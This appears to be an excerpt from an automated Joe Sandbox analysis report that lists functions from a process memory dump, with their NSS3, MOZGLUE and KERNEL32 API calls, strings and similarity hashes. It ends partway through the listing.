Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 5f8112ed3731206a53f1abb9d92491d85f26da1e15e671d6dbdff2e92f627fbc
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 981172A5B012059BEB10AF6E6C41B6BBAEC9F9854DF044039FD09D7751FB60D90886B3

Function 6CCB8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CCB8C1B
EnterCriticalSection.KERNEL32 ref: 6CCB8C34
PL_ArenaAllocate.NSS3 ref: 6CCB8C65
PR_Unlock.NSS3 ref: 6CCB8C9C
PR_Unlock.NSS3 ref: 6CCB8CB6

Part of subcall function 6CD4DD70: TlsGetValue.KERNEL32 ref: 6CD4DD8C
Part of subcall function 6CD4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CD4DDB4

Strings

KRAM, xrefs: 6CCB8C8F

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 015fa83b15f28bf440afe23d9a300cda4d8d2a51970677e9fdc5f12df7934095
Instruction ID: cf61fc7a697cf8039a329f18b918f7e42c8ce4e78af8705bb51b0d1283bcd537
Opcode Fuzzy Hash: 015fa83b15f28bf440afe23d9a300cda4d8d2a51970677e9fdc5f12df7934095
Instruction Fuzzy Hash: 022180B5A056018FD700AFB9C484959BBF4FF45304F05896ED9889B711EB35E88ACB92

Function 6CDB2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CDB2CA0
PR_ExitMonitor.NSS3 ref: 6CDB2CBE
calloc.MOZGLUE(00000001,00000014), ref: 6CDB2CD1
strdup.MOZGLUE(?), ref: 6CDB2CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CDB2D27

Strings

Loaded library %s (static lib), xrefs: 6CDB2D22

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: a42b3d9969cdcc0592e42073ca8f57beb72ca55bcada9252886c7087ba4e4e75
Instruction ID: 2ad18c4af0a15f8a7722b44c4d73fdae1c7a9cdbc54cf74a7e9fec2c31ccd5c8
Opcode Fuzzy Hash: a42b3d9969cdcc0592e42073ca8f57beb72ca55bcada9252886c7087ba4e4e75
Instruction Fuzzy Hash: 5311B2F27012009FEB108F55EC48A6677B4EB4931DF14852DD84A9BB61E732E828CBE1

Function 6CD00FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CCA87ED,00000800,6CC9EF74,00000000), ref: 6CD01000
PR_NewLock.NSS3(?,00000800,6CC9EF74,00000000), ref: 6CD01016

Part of subcall function 6CD698D0: calloc.MOZGLUE(00000001,00000084,6CC90936,00000001,?,6CC9102C), ref: 6CD698E5

PL_InitArenaPool.NSS3(00000000,security,6CCA87ED,00000008,?,00000800,6CC9EF74,00000000), ref: 6CD0102B
TlsGetValue.KERNEL32(00000000,?,?,6CCA87ED,00000800,6CC9EF74,00000000), ref: 6CD01044
free.MOZGLUE(00000000,?,00000800,6CC9EF74,00000000), ref: 6CD01064

Strings

security, xrefs: 6CD01025

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 666b49274516f62d2995c39f1a72299c5fb1caa5c0a8456bd46a4ed81ad89d2c
Instruction ID: 218415b8c0b25962eb074adaab0fb6a0f0521a015e33106b93b10cc866d81b85
Opcode Fuzzy Hash: 666b49274516f62d2995c39f1a72299c5fb1caa5c0a8456bd46a4ed81ad89d2c
Instruction Fuzzy Hash: D0014470B002509BE7306F2C9C05A563A7CBF4678CF01421AE98896A71EB71D168DBE2

Function 6CD42E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6CD43046

Part of subcall function 6CD2EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CD2EE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CD17FFB), ref: 6CD4312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CD43154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CD42E8B

Part of subcall function 6CD4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CD4C2BF

Part of subcall function 6CD2F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CD19BFF,?,00000000,00000000), ref: 6CD2F134

memcpy.VCRUNTIME140(8B3C75C0,?,6CD17FFA), ref: 6CD42EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD4317B

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: 7d4674325b91a15c2b3b8d08aec800fa846057bda93cb93cd2f99f2983592b99
Instruction ID: 849de2b36f7b7556c2203f2cd202a06e3f0d920b4298ff289883814aae9d2145
Opcode Fuzzy Hash: 7d4674325b91a15c2b3b8d08aec800fa846057bda93cb93cd2f99f2983592b99
Instruction Fuzzy Hash: 7EA1BE75A002189FDB24CF54CC80BEAB7B5EF49308F048199EE49A7791E771AD85CFA1

Function 6CD0ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CD0ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CD0EDCE

Part of subcall function 6CD00BE0: malloc.MOZGLUE(6CCF8D2D,?,00000000,?), ref: 6CD00BF8
Part of subcall function 6CD00BE0: TlsGetValue.KERNEL32(6CCF8D2D,?,00000000,?), ref: 6CD00C15

free.MOZGLUE(00000000,?,?,?,?,6CD0B04F), ref: 6CD0EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CD0EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CD0EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CD0EEFB

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: e13dad56f9c1b5f993da1ace11f00d5e612bb430cc2fbaf5f536c9b553d877de
Instruction ID: fd0b710e27516cef9e4e33d6e69b01bbe4d40af0676e06eeed12647070326a22
Opcode Fuzzy Hash: e13dad56f9c1b5f993da1ace11f00d5e612bb430cc2fbaf5f536c9b553d877de
Instruction Fuzzy Hash: 1A813BB5B00209DFEB14CF59D884AAB7BF5AF88308F14442CE99597B61D731E814CBA1

Function 6CD0CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CD0C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CD0DAE2,?), ref: 6CD0C6C2

PR_Now.NSS3 ref: 6CD0CD35

Part of subcall function 6CD69DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CDB0A27), ref: 6CD69DC6
Part of subcall function 6CD69DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CDB0A27), ref: 6CD69DD1
Part of subcall function 6CD69DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CD69DED

Part of subcall function 6CCF6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CCA1C6F,00000000,00000004,?,?), ref: 6CCF6C3F

PR_GetCurrentThread.NSS3 ref: 6CD0CD54

Part of subcall function 6CD69BF0: TlsGetValue.KERNEL32(?,?,?,6CDB0A75), ref: 6CD69C07

Part of subcall function 6CCF7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CCA1CCC,00000000,00000000,?,?), ref: 6CCF729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD0CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CD0CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CD0CE2C

Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD010F3
Part of subcall function 6CD010C0: EnterCriticalSection.KERNEL32(?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0110C
Part of subcall function 6CD010C0: PL_ArenaAllocate.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01141
Part of subcall function 6CD010C0: PR_Unlock.NSS3(?,?,?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD01182
Part of subcall function 6CD010C0: TlsGetValue.KERNEL32(?,6CCA8802,00000000,00000008,?,6CC9EF74,00000000), ref: 6CD0119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CD0CE40

Part of subcall function 6CD014C0: TlsGetValue.KERNEL32 ref: 6CD014E0
Part of subcall function 6CD014C0: EnterCriticalSection.KERNEL32 ref: 6CD014F5
Part of subcall function 6CD014C0: PR_Unlock.NSS3 ref: 6CD0150D

Part of subcall function 6CD0CEE0: PORT_ArenaMark_Util.NSS3(?,6CD0CD93,?), ref: 6CD0CEEE
Part of subcall function 6CD0CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CD0CD93,?), ref: 6CD0CEFC
Part of subcall function 6CD0CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CD0CD93,?), ref: 6CD0CF0B
Part of subcall function 6CD0CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CD0CD93,?), ref: 6CD0CF1D

Part of subcall function 6CD0CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CD0CD93,?), ref: 6CD0CF47
Part of subcall function 6CD0CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CD0CD93,?), ref: 6CD0CF67
Part of subcall function 6CD0CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CD0CD93,?,?,?,?,?,?,?,?,?,?,?,6CD0CD93,?), ref: 6CD0CF78

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: c6e4ca1d663203fd77fd8563ac160b790fd3fd12fdd21e33c4d9705423eb2da0
Instruction ID: 7674f8499111284716f4a42c99ba56f82f29e5e955b9f24f5b18e8a66f0d064c
Opcode Fuzzy Hash: c6e4ca1d663203fd77fd8563ac160b790fd3fd12fdd21e33c4d9705423eb2da0
Instruction Fuzzy Hash: A65193B6B001049BE710DF6DDC40BAA77F4EF88348F250524D95597B60EB31E945CBB2

Function 6CCDEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CCDEF38

Part of subcall function 6CCC9520: PK11_IsLoggedIn.NSS3(00000000,?,6CCF379E,?,00000001,?), ref: 6CCC9542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CCDEF53

Part of subcall function 6CCE4C20: TlsGetValue.KERNEL32 ref: 6CCE4C4C
Part of subcall function 6CCE4C20: EnterCriticalSection.KERNEL32(?), ref: 6CCE4C60
Part of subcall function 6CCE4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CCE4CA1
Part of subcall function 6CCE4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CCE4CBE
Part of subcall function 6CCE4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CCE4CD2
Part of subcall function 6CCE4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CCE4D3A

PR_GetCurrentThread.NSS3 ref: 6CCDEF9E

Part of subcall function 6CD69BF0: TlsGetValue.KERNEL32(?,?,?,6CDB0A75), ref: 6CD69C07

free.MOZGLUE(00000000), ref: 6CCDEFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CCDF016
free.MOZGLUE(00000000), ref: 6CCDF022

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 273260dac66be2365e936151004a1b62dc35160965295c53cd0d6825b39f8cbd
Instruction ID: 0e7da73259326daec1155384306088814f2b3076c3feb4eb8cd50e0bf0b35cd0
Opcode Fuzzy Hash: 273260dac66be2365e936151004a1b62dc35160965295c53cd0d6825b39f8cbd
Instruction Fuzzy Hash: 6B418071E00209AFDF018FA9DC85AEE7BB9AB48358F054029FA14A7750F771E915CBA1

Function 6CCCCF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6CCCCF80
SECITEM_DupItem_Util.NSS3(?), ref: 6CCCD002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6CCCD016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CCCD025
PR_NewLock.NSS3 ref: 6CCCD043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CCCD074

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: adf6f6520efed8d0184021832df7dd83207cd3a3c838ca4c2ac5b255820afde5
Instruction ID: 44ff46d8d102088050838dbde44fca6c0d984d7b48f1c8a9d4dcb68fccf36258
Opcode Fuzzy Hash: adf6f6520efed8d0184021832df7dd83207cd3a3c838ca4c2ac5b255820afde5
Instruction Fuzzy Hash: C8417FB0B412159FEB10DF2DC88479A7BE4EF08358F11416ADC198BB56E774D48ACBA2

Function 6CCB2E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CCA2D1A), ref: 6CCB2E7E

Part of subcall function 6CD007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CCA8298,?,?,?,6CC9FCE5,?), ref: 6CD007BF
Part of subcall function 6CD007B0: PL_HashTableLookup.NSS3(?,?), ref: 6CD007E6
Part of subcall function 6CD007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CD0081B
Part of subcall function 6CD007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CD00825

PR_Now.NSS3 ref: 6CCB2EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CCB2EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CCA2D1A), ref: 6CCB2F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CCA2D1A), ref: 6CCB2F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CCB2F81

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 2f8e74260785b6339155bfbc7f837fd23a1d8b08353ff46bbaa198530150ab0d
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 1831F3715011608BE710C6D6CC68BAFB3A5EF81358F644A79D429A7AD0FB319C8ACA21

Function 6CCA0E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6CCA0A2C), ref: 6CCA0E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CCA0A2C), ref: 6CCA0E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CCA0A2C), ref: 6CCA0E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6CCA0A2C), ref: 6CCA0E90
free.MOZGLUE(00000000), ref: 6CCA0EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CCA0A2C), ref: 6CCA0ED9

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 556d542b49faae8e404e7499c53fad0726d792d3d5cf190995e93b310b9efc17
Instruction ID: 549479b3795d6c06423ce0e5861d46bf5d9a5ec2d9b294fbd418a6fb5306bf28
Opcode Fuzzy Hash: 556d542b49faae8e404e7499c53fad0726d792d3d5cf190995e93b310b9efc17
Instruction Fuzzy Hash: 9A216172F002865BEB104AE65C4DB6772AEEFC17C8F050035D85B53A11FA61D817D2A1

Function 6CCAAE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CCAAEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CCAAECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CCAAEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6CCAAF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CDC9500), ref: 6CCAAF23

Part of subcall function 6CCFF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CCFF0C8
Part of subcall function 6CCFF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CCFF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CCAAF37

Memory Dump Source

Source File: 00000009.00000002.3203659412.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true

Associated: 00000009.00000002.3203622798.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205613490.000000006CDFE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205709082.000000006CDFF000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205754728.000000006CE00000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000009.00000002.3205853177.000000006CE05000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6cc20000_kat2225.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 53a08f3122160ae686978b9c6ae04c5b34845f4ab55576791091cac3baaddbdb
Instruction ID: 7bc9118e7b17fa77ea4509bf57f0b84fb84e13176d98860a0403826560c15b9e
Opcode Fuzzy Hash: 53a08f3122160ae686978b9c6ae04c5b34845f4ab55576791091cac3baaddbdb
Instruction Fuzzy Hash: C8214871909201ABEB108F598C41B9A7BE4AFC932CF144319FD649B791F731D50A8BB3

Function 6CD2EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CD2EE85
realloc.MOZGLUE(0914E8F8,?), ref: 6CD2EEAE
PORT_Alloc_Util.NSS3(?), ref: 6CD2EEC5

Part of subcall function 6CD00BE0: malloc.MOZGLUE(6CCF8D2D,?,00000000,?), ref: 6CD00BF8
Part of subcall function 6CD00BE0: TlsGetValue.KERNEL32(6CCF8D2D,?,00000000,?), ref: 6CD00C15

htonl.WSOCK32(?), ref: 6CD2EEE3
htonl.WSOCK32(00000000,?), ref: 6CD2EEED
